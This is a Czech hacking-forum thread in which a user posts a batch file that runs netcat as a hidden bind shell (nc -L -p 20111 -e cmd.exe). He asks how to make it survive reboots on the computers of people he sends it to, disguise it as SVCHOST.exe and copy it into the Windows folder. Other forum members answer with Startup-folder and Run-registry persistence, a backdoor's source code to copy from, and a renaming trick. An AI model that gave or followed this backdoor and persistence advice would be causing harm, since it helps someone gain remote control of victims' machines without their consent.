autorun

HackForum

autorun#
zdravim... mam jednoduchy batak, kde spustim netcat na portu 20111. Mam slozku, kde je .bat soubor a netcat. Kdyz ji nekomu poslu...tak se pripojim v pohode,ale po restartu uz to nejde. Chtel bych tedy nejak udelat to, aby se mi spustil vzdycky po najeti systemu a aby se spoustel i pod jinym jmenem. napr SVCHOST.exe atp. a aby se nahral zkopiroval nekam do slozky Windows... snad pochopite..děkuji. Docela jsem nad tim premyslel a nic me nenapadlo.=( a co me napadlo, tak to nefungovalo :((
(odpovědět)
Batak | 85.132.198.*22.3.2007 22:14
re: autorun#
Hint: Po Spusteni(Startup), Registry (Run) .. neco si o tom najdi ... Pochybuji ze jsis ten batak udelal sam kdyz ani nevis jak udelat tohle.. Na google napr. je toho spousty preceti si neco o tom (Batch files, Startup,...). Ver mi, pomuze ti to...

----------
Cow power by Gentoo...
(odpovědět)
Anonymous_ | E-mail22.3.2007 22:43
re: autorun#
Anonymous_ :
@echo off
@start nc.exe -d -L -p 20111 -e cmd.exe
@exit

to vim jak, ale chci to udelat , tak jak jsem popisoval v predchozim prispevku
(odpovědět)
Batak | 85.132.198.*22.3.2007 23:28
re: autorun#
Batak: Co třeba takový příkaz copy ve win shellu?Přecti si o ní v helpu ;) Tím si překopíruj ten batak do: po spusteni...Jak to dostat do registru bych se musel mrknout na google a to se mi teď nechce, ale určitě to nebude záležitost dlouhého hledání ;) Nebo se prostě mrkni do nějakých zdrojových kódů, které se tím zabývají a najdeš to tam taky :) Mám pocit, že když se podíváš do zdrojáku třeba IEWEBDOOR, tak tam to přidání do registrů najdeš ;) Pak se ti to spustí po každém startu pc ;) A aby se spoustel pod jiným jménem ho myslím stači jen přejmenovat ;) ale to nvm jiste..

----------
Niemand ist so gut,wie er denkt ;)
(odpovědět)
Darth | E-mail23.3.2007 12:43
re: autorun#
Nechápu proč by sem měl spouštět furt pod jiným jménem, totiž potom by to chtělo po každém spuštění potvrzení od FW, každopádně by to ale šlo. Přidání do registru je uplna primitivnost:
V regu si nastav aby se uložil do registru v tomhle umístění údaj o spuštění toho nc
[HKEY_LOCAL_MACHINE\Software\Microsoft\Wind
ows\CurrentVersion\Run]
Pokud uživatel cílový nemá admin práva tak tam aspoň nahraď hkey_local_machine na HKEY_LOCAL_USER.
Pokud bys trval na tom že po každem spuštění bude mít náhodný název, pak bys musel vytvořit eště něco jako 'meziprogram který ti ho přejmenuje nějakým způsobem rand().exe a právě tento meziprogram dát do registru. Nevím k čemu ti to ale bude, když neznáš ani copy
(odpovědět)
nejmenuje | E-mail | Website | ICQ 26000797623.3.2007 12:52

Zpět
 
 
 

 
BBCode